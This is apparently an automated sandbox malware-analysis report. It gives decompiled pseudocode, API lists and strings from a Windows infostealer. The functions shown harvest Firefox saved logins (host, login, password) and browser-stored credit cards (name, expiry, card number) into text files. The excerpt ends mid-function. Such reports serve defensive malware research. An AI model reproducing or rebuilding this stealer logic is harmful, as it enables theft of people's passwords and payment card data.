                                                                                • Instruction Fuzzy Hash: 1F81E035944218BFEB256B22DC0AFEE7778EF09314F5040BBF409A20A1DF395E949E59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 42%
                                                                                			E0041078A(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t32;
                                                                                				void* _t46;
                                                                                				void* _t57;
                                                                                				void* _t63;
                                                                                				void* _t70;
                                                                                				void* _t78;
                                                                                				void* _t80;
                                                                                				void* _t81;
                                                                                				void* _t93;
                                                                                				void* _t94;
                                                                                				void* _t95;
                                                                                				void* _t104;
                                                                                				CHAR* _t105;
                                                                                				void* _t106;
                                                                                				intOrPtr _t107;
                                                                                				char* _t108;
                                                                                				signed int _t109;
                                                                                				void* _t111;
                                                                                				void* _t112;
                                                                                				void* _t114;
                                                                                				void* _t115;
                                                                                
                                                                                				_t93 = __edx;
                                                                                				_t109 = _t111 - 0x1094;
                                                                                				E00430D40(0x1114);
                                                                                				_t32 =  *0x447674; // 0x4124c941
                                                                                				 *(_t109 + 0x1090) = _t32 ^ _t109;
                                                                                				 *((intOrPtr*)(_t109 - 0x80)) =  *((intOrPtr*)(_t109 + 0x109c));
                                                                                				_t105 = __ecx;
                                                                                				 *0x44a1a8(0, 0x1a, 0, 0, _t109 + 0xf8c, _t104, _t78);
                                                                                				E0041FF3A(__ecx, 4, "%s\\Mozilla\\Firefox\\profiles.ini", _t109 + 0xf8c);
                                                                                				_t112 = _t111 + 0x10;
                                                                                				GetPrivateProfileSectionNamesA(_t109 - 0x74, 0x1000, _t105);
                                                                                				_push(_t105);
                                                                                				if( *0x44a090() == 0) {
                                                                                					_push(0x44a060);
                                                                                					if(E0041F2F3() < 0x20) {
                                                                                						_push(0);
                                                                                						_t107 = E00420300(E0040F445(_t105,  *0x44a034), "r");
                                                                                						_t114 = _t112 + 0x14;
                                                                                						 *((intOrPtr*)(_t109 - 0x7c)) = _t107;
                                                                                						_t120 = _t107;
                                                                                						if(_t107 != 0) {
                                                                                							_push(_t94);
                                                                                							_push(2);
                                                                                							_push(0);
                                                                                							_push(_t107);
                                                                                							E00420BEA(0, _t93, _t94, _t107, _t120);
                                                                                							_push(_t107);
                                                                                							_t46 = E00420A4E(0, _t94, _t107, _t120);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(_t107);
                                                                                							_t95 = _t46;
                                                                                							E00420BEA(0, _t93, _t95, _t107, _t120);
                                                                                							_t9 = _t95 + 1; // 0x1
                                                                                							 *((intOrPtr*)(_t109 - 0x78)) = E0041D474(0, _t93, _t95, _t107, _t120, _t9);
                                                                                							E00420657(_t49, 1, _t95, _t107);
                                                                                							_t81 = E00420300( *0x449f3c, "a+");
                                                                                							_t115 = _t114 + 0x38;
                                                                                							if(_t81 != 0) {
                                                                                								_t95 = E0041E5C0( *((intOrPtr*)(_t109 - 0x78)),  *0x449c10);
                                                                                								_t122 = _t95;
                                                                                								if(_t95 != 0) {
                                                                                									_t108 = "\n";
                                                                                									do {
                                                                                										_t13 = lstrlenA( *0x449c10) + 3; // 0x3
                                                                                										 *((intOrPtr*)(_t109 - 0x78)) = _t95 + _t13;
                                                                                										_t57 = E0041E5C0(_t95 + _t13,  *0x449d78);
                                                                                										_t96 = _t57;
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										 *((char*)(_t57 - 3)) = 0;
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push( *((intOrPtr*)(_t109 - 0x80)));
                                                                                										_push("Soft: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push( *((intOrPtr*)(_t109 - 0x78)));
                                                                                										_push("Host: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t57, _t108, _t122);
                                                                                										_t63 = E0041E5C0(_t96 + 0xfffffffe,  *0x449ec8);
                                                                                										 *((intOrPtr*)(_t109 - 0x78)) = lstrlenA( *0x449ec8) + _t63 + 3;
                                                                                										 *((char*)(E0041E5C0(lstrlenA( *0x449ec8) + _t63 + 3,  *0x449ec4) - 3)) = 0;
                                                                                										_push(E0040F4BC( *((intOrPtr*)(_t109 - 0x78)), _t93));
                                                                                										_push("Login: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t66, _t108, _t122);
                                                                                										_push(_t108);
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t66, _t108, _t122);
                                                                                										_t70 = E0041E5C0(_t66 + 0xfffffffe,  *0x449ec4);
                                                                                										 *((intOrPtr*)(_t109 - 0x78)) = lstrlenA( *0x449ec4) + _t70 + 3;
                                                                                										 *((char*)(E0041E5C0(lstrlenA( *0x449ec4) + _t70 + 3,  *0x449fbc) - 3)) = 0;
                                                                                										_push(E0040F4BC( *((intOrPtr*)(_t109 - 0x78)), _t93));
                                                                                										_push("Password: %s");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t73, _t108, _t122);
                                                                                										_push("\n\n");
                                                                                										_push(_t81);
                                                                                										E0041E879(_t81, _t73, _t108, _t122);
                                                                                										_t95 = E0041E5C0(_t73 + 0xfffffffe,  *0x449c10);
                                                                                										_t115 = _t115 + 0x88;
                                                                                										_t123 = _t95;
                                                                                									} while (_t95 != 0);
                                                                                									_t107 =  *((intOrPtr*)(_t109 - 0x7c));
                                                                                								}
                                                                                								_push(_t81);
                                                                                								E0041EAA2(_t81, _t95, _t107, _t123);
                                                                                							}
                                                                                							E0041EAA2(_t81, _t95, _t107, _t123);
                                                                                							_t94 = _t107;
                                                                                						}
                                                                                						_t41 =  *0x44a0ac();
                                                                                					}
                                                                                				}
                                                                                				_pop(_t106);
                                                                                				_pop(_t80);
                                                                                				return E0041DEB4(_t41, _t80,  *(_t109 + 0x1090) ^ _t109, _t93, _t94, _t106);
                                                                                			}




























                                                                                0x0041078a
                                                                                0x0041078b
                                                                                0x00410797
                                                                                0x0041079c
                                                                                0x004107a3
                                                                                0x004107b1
                                                                                0x004107c2
                                                                                0x004107c4
                                                                                0x004107d9
                                                                                0x004107de
                                                                                0x004107eb
                                                                                0x004107f1
                                                                                0x004107fb
                                                                                0x00410801
                                                                                0x0041080f
                                                                                0x00410815
                                                                                0x0041082d
                                                                                0x0041082f
                                                                                0x00410832
                                                                                0x00410835
                                                                                0x00410837
                                                                                0x0041083d
                                                                                0x0041083e
                                                                                0x00410840
                                                                                0x00410841
                                                                                0x00410842
                                                                                0x00410847
                                                                                0x00410848
                                                                                0x0041084d
                                                                                0x0041084e
                                                                                0x0041084f
                                                                                0x00410850
                                                                                0x00410852
                                                                                0x00410857
                                                                                0x00410865
                                                                                0x00410868
                                                                                0x0041087d
                                                                                0x0041087f
                                                                                0x00410884
                                                                                0x00410898
                                                                                0x0041089c
                                                                                0x0041089e
                                                                                0x004108a4
                                                                                0x004108a9
                                                                                0x004108bb
                                                                                0x004108c0
                                                                                0x004108c3
                                                                                0x004108c8
                                                                                0x004108ca
                                                                                0x004108cb
                                                                                0x004108cc
                                                                                0x004108d0
                                                                                0x004108d5
                                                                                0x004108d8
                                                                                0x004108dd
                                                                                0x004108de
                                                                                0x004108e3
                                                                                0x004108e4
                                                                                0x004108e5
                                                                                0x004108ea
                                                                                0x004108ed
                                                                                0x004108f2
                                                                                0x004108f3
                                                                                0x004108f8
                                                                                0x004108f9
                                                                                0x004108fa
                                                                                0x00410909
                                                                                0x0041092a
                                                                                0x00410937
                                                                                0x00410940
                                                                                0x00410941
                                                                                0x00410946
                                                                                0x00410947
                                                                                0x0041094c
                                                                                0x0041094d
                                                                                0x0041094e
                                                                                0x0041095d
                                                                                0x0041097e
                                                                                0x0041098b
                                                                                0x00410994
                                                                                0x00410995
                                                                                0x0041099a
                                                                                0x0041099b
                                                                                0x004109a0
                                                                                0x004109a5
                                                                                0x004109a6
                                                                                0x004109ba
                                                                                0x004109bc
                                                                                0x004109bf
                                                                                0x004109bf
                                                                                0x004109c7
                                                                                0x004109c7
                                                                                0x004109ca
                                                                                0x004109cb
                                                                                0x004109d0
                                                                                0x004109d2
                                                                                0x004109d8
                                                                                0x004109d8
                                                                                0x004109d9
                                                                                0x004109d9
                                                                                0x0041080f
                                                                                0x004109e5
                                                                                0x004109e8
                                                                                0x004109f5

                                                                                APIs
                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,(>A(C,?,?,00411258,(>A(C), ref: 004107C4
                                                                                • __snprintf.LIBCMT ref: 004107D9
                                                                                • GetPrivateProfileSectionNamesA.KERNEL32 ref: 004107EB
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000104,00000000,014A06E0,?,?,00413C88,00000000,00440C68,014A06E0,00000000,014A10F8,00000104,00413E0B), ref: 0040F44E
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 0040F463
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000000,?), ref: 0040F482
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040F489
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000001,?), ref: 0040F49D
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0040F4A4
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fseek.LIBCMT ref: 00410842
                                                                                • _fseek.LIBCMT ref: 00410852
                                                                                  • Part of subcall function 00420BEA: __lock_file.LIBCMT ref: 00420C2B
                                                                                  • Part of subcall function 00420BEA: __fseek_nolock.LIBCMT ref: 00420C3C
                                                                                • __fread_nolock.LIBCMT ref: 00410868
                                                                                • lstrlenA.KERNEL32 ref: 004108AF
                                                                                • _fprintf.LIBCMT ref: 004108D0
                                                                                • _fprintf.LIBCMT ref: 004108DE
                                                                                  • Part of subcall function 0041E879: __lock_file.LIBCMT ref: 0041E8C0
                                                                                  • Part of subcall function 0041E879: __stbuf.LIBCMT ref: 0041E944
                                                                                  • Part of subcall function 0041E879: __output_l.LIBCMT ref: 0041E954
                                                                                  • Part of subcall function 0041E879: __ftbuf.LIBCMT ref: 0041E95E
                                                                                • _fprintf.LIBCMT ref: 004108E5
                                                                                • _fprintf.LIBCMT ref: 004108F3
                                                                                • _fprintf.LIBCMT ref: 004108FA
                                                                                • lstrlenA.KERNEL32 ref: 00410919
                                                                                  • Part of subcall function 0040F4BC: _memset.LIBCMT ref: 0040F4F8
                                                                                  • Part of subcall function 0040F4BC: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,00410940,?), ref: 0040F50D
                                                                                  • Part of subcall function 0040F4BC: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040F515
                                                                                  • Part of subcall function 0040F4BC: _memmove.LIBCMT ref: 0040F56F
                                                                                • _fprintf.LIBCMT ref: 00410947
                                                                                • _fprintf.LIBCMT ref: 0041094E
                                                                                • lstrlenA.KERNEL32 ref: 0041096D
                                                                                  • Part of subcall function 0040F4BC: lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F585
                                                                                  • Part of subcall function 0040F4BC: lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F597
                                                                                • _fprintf.LIBCMT ref: 0041099B
                                                                                • _fprintf.LIBCMT ref: 004109A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$lstrlen$__lock_file_fseeklstrcatlstrcpy$BinaryCryptFolderNamesPathPrivateProfileSectionString__fread_nolock__fseek_nolock__fsopen__ftbuf__output_l__snprintf__stbuf_memmove_memset
                                                                                • String ID: %s\Mozilla\Firefox\profiles.ini$(>A(C$Host: %s$Login: %s$Password: %s$Soft: %s$hC
                                                                                • API String ID: 1811832273-1741104210
                                                                                • Opcode ID: be1ab379d4f0d7b35feaa5507a1d1b9e33798201449bcb0e3eb15057172c3fa2
                                                                                • Instruction ID: baf3850fd12081ab16c8110e9ac8bcdef673c7f06b7b7691f3d058a77f375f6e
                                                                                • Opcode Fuzzy Hash: be1ab379d4f0d7b35feaa5507a1d1b9e33798201449bcb0e3eb15057172c3fa2
                                                                                • Instruction Fuzzy Hash: AA51B8799002047ADB10BBB79C46EDF7AAD9F4535CF14043AF905A3193EA7C8891876D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E00427CAF(void* __ebx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				_Unknown_base(*)()* _t7;
                                                                                				long _t10;
                                                                                				void* _t11;
                                                                                				int _t12;
                                                                                				void* _t14;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                				void* _t18;
                                                                                				intOrPtr _t21;
                                                                                				long _t26;
                                                                                				void* _t30;
                                                                                				struct HINSTANCE__* _t35;
                                                                                				intOrPtr* _t36;
                                                                                				void* _t39;
                                                                                				intOrPtr* _t41;
                                                                                				void* _t42;
                                                                                
                                                                                				_t30 = __ebx;
                                                                                				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                				if(_t35 != 0) {
                                                                                					 *0x4497c0 = GetProcAddress(_t35, "FlsAlloc");
                                                                                					 *0x4497c4 = GetProcAddress(_t35, "FlsGetValue");
                                                                                					 *0x4497c8 = GetProcAddress(_t35, "FlsSetValue");
                                                                                					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                					__eflags =  *0x4497c0;
                                                                                					_t39 = TlsSetValue;
                                                                                					 *0x4497cc = _t7;
                                                                                					if( *0x4497c0 == 0) {
                                                                                						L6:
                                                                                						 *0x4497c4 = TlsGetValue;
                                                                                						 *0x4497c0 = E004279BF;
                                                                                						 *0x4497c8 = _t39;
                                                                                						 *0x4497cc = TlsFree;
                                                                                					} else {
                                                                                						__eflags =  *0x4497c4;
                                                                                						if( *0x4497c4 == 0) {
                                                                                							goto L6;
                                                                                						} else {
                                                                                							__eflags =  *0x4497c8;
                                                                                							if( *0x4497c8 == 0) {
                                                                                								goto L6;
                                                                                							} else {
                                                                                								__eflags = _t7;
                                                                                								if(_t7 == 0) {
                                                                                									goto L6;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t10 = TlsAlloc();
                                                                                					 *0x447e48 = _t10;
                                                                                					__eflags = _t10 - 0xffffffff;
                                                                                					if(_t10 == 0xffffffff) {
                                                                                						L15:
                                                                                						_t11 = 0;
                                                                                						__eflags = 0;
                                                                                					} else {
                                                                                						_t12 = TlsSetValue(_t10,  *0x4497c4);
                                                                                						__eflags = _t12;
                                                                                						if(_t12 == 0) {
                                                                                							goto L15;
                                                                                						} else {
                                                                                							E0042416A();
                                                                                							_t41 = __imp__EncodePointer;
                                                                                							_t14 =  *_t41( *0x4497c0);
                                                                                							 *0x4497c0 = _t14;
                                                                                							_t15 =  *_t41( *0x4497c4);
                                                                                							 *0x4497c4 = _t15;
                                                                                							_t16 =  *_t41( *0x4497c8);
                                                                                							 *0x4497c8 = _t16;
                                                                                							 *0x4497cc =  *_t41( *0x4497cc);
                                                                                							_t18 = E00428EFE();
                                                                                							__eflags = _t18;
                                                                                							if(_t18 == 0) {
                                                                                								L14:
                                                                                								E004279FC();
                                                                                								goto L15;
                                                                                							} else {
                                                                                								_t36 = __imp__DecodePointer;
                                                                                								_t21 =  *((intOrPtr*)( *_t36()))( *0x4497c0, E00427B80);
                                                                                								 *0x447e44 = _t21;
                                                                                								__eflags = _t21 - 0xffffffff;
                                                                                								if(_t21 == 0xffffffff) {
                                                                                									goto L14;
                                                                                								} else {
                                                                                									_t42 = E0042303F(1, 0x214);
                                                                                									__eflags = _t42;
                                                                                									if(_t42 == 0) {
                                                                                										goto L14;
                                                                                									} else {
                                                                                										__eflags =  *((intOrPtr*)( *_t36()))( *0x4497c8,  *0x447e44, _t42);
                                                                                										if(__eflags == 0) {
                                                                                											goto L14;
                                                                                										} else {
                                                                                											_push(0);
                                                                                											_push(_t42);
                                                                                											E00427A39(_t30, _t36, _t42, __eflags);
                                                                                											_t26 = GetCurrentThreadId();
                                                                                											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                											 *_t42 = _t26;
                                                                                											_t11 = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return _t11;
                                                                                				} else {
                                                                                					E004279FC();
                                                                                					return 0;
                                                                                				}
                                                                                			}





















                                                                                0x00427caf
                                                                                0x00427cbd
                                                                                0x00427cc1
                                                                                0x00427ce1
                                                                                0x00427cee
                                                                                0x00427cfb
                                                                                0x00427d00
                                                                                0x00427d02
                                                                                0x00427d09
                                                                                0x00427d0f
                                                                                0x00427d14
                                                                                0x00427d2c
                                                                                0x00427d31
                                                                                0x00427d3b
                                                                                0x00427d45
                                                                                0x00427d4b
                                                                                0x00427d16
                                                                                0x00427d16
                                                                                0x00427d1d
                                                                                0x00000000
                                                                                0x00427d1f
                                                                                0x00427d1f
                                                                                0x00427d26
                                                                                0x00000000
                                                                                0x00427d28
                                                                                0x00427d28
                                                                                0x00427d2a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00427d2a
                                                                                0x00427d26
                                                                                0x00427d1d
                                                                                0x00427d50
                                                                                0x00427d56
                                                                                0x00427d5b
                                                                                0x00427d5e
                                                                                0x00427e25
                                                                                0x00427e25
                                                                                0x00427e25
                                                                                0x00427d64
                                                                                0x00427d6b
                                                                                0x00427d6d
                                                                                0x00427d6f
                                                                                0x00000000
                                                                                0x00427d75
                                                                                0x00427d75
                                                                                0x00427d80
                                                                                0x00427d86
                                                                                0x00427d8e
                                                                                0x00427d93
                                                                                0x00427d9b
                                                                                0x00427da0
                                                                                0x00427da8
                                                                                0x00427daf
                                                                                0x00427db4
                                                                                0x00427db9
                                                                                0x00427dbb
                                                                                0x00427e20
                                                                                0x00427e20
                                                                                0x00000000
                                                                                0x00427dbd
                                                                                0x00427dbd
                                                                                0x00427dd0
                                                                                0x00427dd2
                                                                                0x00427dd7
                                                                                0x00427dda
                                                                                0x00000000
                                                                                0x00427ddc
                                                                                0x00427de8
                                                                                0x00427dec
                                                                                0x00427dee
                                                                                0x00000000
                                                                                0x00427df0
                                                                                0x00427e01
                                                                                0x00427e03
                                                                                0x00000000
                                                                                0x00427e05
                                                                                0x00427e05
                                                                                0x00427e07
                                                                                0x00427e08
                                                                                0x00427e0f
                                                                                0x00427e15
                                                                                0x00427e19
                                                                                0x00427e1d
                                                                                0x00427e1d
                                                                                0x00427e03
                                                                                0x00427dee
                                                                                0x00427dda
                                                                                0x00427dbb
                                                                                0x00427d6f
                                                                                0x00427e29
                                                                                0x00427cc3
                                                                                0x00427cc3
                                                                                0x00427ccb
                                                                                0x00427ccb

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00421039), ref: 00427CB7
                                                                                • __mtterm.LIBCMT ref: 00427CC3
                                                                                  • Part of subcall function 004279FC: DecodePointer.KERNEL32(0000000A,00427E25,?,00421039), ref: 00427A0D
                                                                                  • Part of subcall function 004279FC: TlsFree.KERNEL32(00000027,00427E25,?,00421039), ref: 00427A27
                                                                                  • Part of subcall function 004279FC: DeleteCriticalSection.KERNEL32(00000000,00000000,773DF3A0,?,00427E25,?,00421039), ref: 00428F65
                                                                                  • Part of subcall function 004279FC: _free.LIBCMT ref: 00428F68
                                                                                  • Part of subcall function 004279FC: DeleteCriticalSection.KERNEL32(00000027,773DF3A0,?,00427E25,?,00421039), ref: 00428F8F
                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00427CD9
                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00427CE6
                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00427CF3
                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00427D00
                                                                                • TlsAlloc.KERNEL32(?,00421039), ref: 00427D50
                                                                                • TlsSetValue.KERNEL32(00000000,?,00421039), ref: 00427D6B
                                                                                • __init_pointers.LIBCMT ref: 00427D75
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427D86
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427D93
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427DA0
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427DAD
                                                                                • DecodePointer.KERNEL32(00427B80,?,00421039), ref: 00427DCE
                                                                                • __calloc_crt.LIBCMT ref: 00427DE3
                                                                                • DecodePointer.KERNEL32(00000000,?,00421039), ref: 00427DFD
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00427E0F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                • API String ID: 3698121176-3819984048
                                                                                • Opcode ID: 4f44fbee8a27556899b1be8080d97de91f67f40b77ff1bcbf12a1ba0ce3e69e2
                                                                                • Instruction ID: 243588d13aa7bb1b1c8f0d2e7a2c701057552b50d3b2cdaf04945bf35de7f862
                                                                                • Opcode Fuzzy Hash: 4f44fbee8a27556899b1be8080d97de91f67f40b77ff1bcbf12a1ba0ce3e69e2
                                                                                • Instruction Fuzzy Hash: F7315E39A54321DADB10AF75BC0965B7EA1FB46B20B50157BE504832F0DB788C42EF9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?), ref: 0040FE2E
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 0040FE40
                                                                                • CopyFileA.KERNEL32 ref: 0040FE50
                                                                                • _memset.LIBCMT ref: 0040FE60
                                                                                • lstrcat.KERNEL32(?), ref: 0040FE75
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 0040FE87
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040FE9A
                                                                                • lstrcat.KERNEL32(?,00441454), ref: 0040FEAC
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040FEBA
                                                                                • lstrcat.KERNEL32(?,.txt), ref: 0040FECC
                                                                                • DeleteFileA.KERNEL32(?), ref: 0041011B
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C64), ref: 0040FFD3
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040FFF1
                                                                                • StrCmpCA.SHLWAPI(?,00440C64), ref: 0040FFFF
                                                                                • lstrcat.KERNEL32(?), ref: 0041001D
                                                                                • lstrcat.KERNEL32(?,00440C64), ref: 00410035
                                                                                • _fprintf.LIBCMT ref: 004100AF
                                                                                • _fprintf.LIBCMT ref: 004100D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
                                                                                • String ID: %s%s%s%s%s%s%s$.txt$\temp
                                                                                • API String ID: 1987428508-1558371589
                                                                                • Opcode ID: 2c904849e27c0097589153de83ff4c6a836ac5d328ee282efad59d48de2a0f40
                                                                                • Instruction ID: 996c30d7aa263e0f2c47c5de6c2453da62c8b9712bd35807121890938a41ba83
                                                                                • Opcode Fuzzy Hash: 2c904849e27c0097589153de83ff4c6a836ac5d328ee282efad59d48de2a0f40
                                                                                • Instruction Fuzzy Hash: 82916875940218AFDB219F60EC4DBDABB79EB09310F1004A6F609E21A0DB799ED4DF19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E00410130(CHAR* __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				char _v568;
                                                                                				char _v572;
                                                                                				intOrPtr _v576;
                                                                                				char _v580;
                                                                                				intOrPtr _v584;
                                                                                				intOrPtr _v588;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t41;
                                                                                				void* _t58;
                                                                                				void* _t63;
                                                                                				intOrPtr _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				void* _t80;
                                                                                				void* _t87;
                                                                                				signed int _t103;
                                                                                				void* _t109;
                                                                                				intOrPtr _t110;
                                                                                				void* _t114;
                                                                                				CHAR* _t116;
                                                                                				signed int _t117;
                                                                                				void* _t118;
                                                                                				void* _t120;
                                                                                				void* _t121;
                                                                                				void* _t125;
                                                                                
                                                                                				_t107 = __edx;
                                                                                				_t41 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t41 ^ _t117;
                                                                                				_v576 = _a4;
                                                                                				_v584 = _a8;
                                                                                				_v588 = _a12;
                                                                                				_t108 = __ecx;
                                                                                				_t86 = __edx;
                                                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                				 *0x44a1b8( &_v276, "\\temp");
                                                                                				CopyFileA(_t108,  &_v276, 1);
                                                                                				E00427E30( &_v540, 0, 0x104);
                                                                                				wsprintfA( &_v540, "CC\\%s_%s.txt", _v576, _t86);
                                                                                				_t114 =  *0x449c48; // 0x149a450
                                                                                				_t58 =  *0x44a0a4( &_v276,  &_v580);
                                                                                				_t120 = _t118 + 0x24;
                                                                                				if(_t58 == 0) {
                                                                                					_t63 =  *0x44a058(_v580, _t114, 0xffffffff,  &_v572, _t58);
                                                                                					_t121 = _t120 + 0x14;
                                                                                					if(_t63 == 0) {
                                                                                						_t67 = E00420300( &_v540, "w");
                                                                                						_v576 = _t67;
                                                                                						if(_t67 != 0) {
                                                                                							_t68 =  *0x44a074(_v572);
                                                                                							while(1) {
                                                                                								_t131 = _t68 - 0x64;
                                                                                								if(_t68 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t69 =  *0x44a094(_v572, 0);
                                                                                								_t70 =  *0x44a094(_v572, 1);
                                                                                								_t109 = _t70;
                                                                                								_t71 =  *0x44a094(_v572, 2);
                                                                                								_t87 = _t71;
                                                                                								E0041E879(_t87, _t109, _t69, __eflags);
                                                                                								_t116 = "\n";
                                                                                								E0041E879(_t87, _t109, _t116, __eflags);
                                                                                								_t110 = _v576;
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								_t107 =  *0x44a088(_v572, 3,  *0x44a080(_v572, 3, _v584, _t110, _t116, _t110, "Year: %s", _t87, _t110, _t116, _t110, "Month: %s", _t109, _v576, _t116, _v576, "Name: %s", _t69));
                                                                                								_t86 =  &_v568;
                                                                                								_t80 = E0040F94A( &_v568, _v588, _t79, _t110, _t116, __eflags);
                                                                                								_t125 = _t121 + 0x4c - 0x14;
                                                                                								_t103 = 7;
                                                                                								_t114 = _t80;
                                                                                								memcpy(_t125, _t114, _t103 << 2);
                                                                                								_t108 = _t114 + _t103 + _t103;
                                                                                								E0041E879( &_v568, _t114 + _t103 + _t103, _t114, __eflags);
                                                                                								E00402C34(_t86, 1, 0);
                                                                                								E0041E879(_t86, _t114 + _t103 + _t103, _t114, __eflags);
                                                                                								_t68 =  *0x44a074(_v572, _v576, "\n\n", _v576, "Card: %s");
                                                                                								_t121 = _t125 + 0x3c;
                                                                                							}
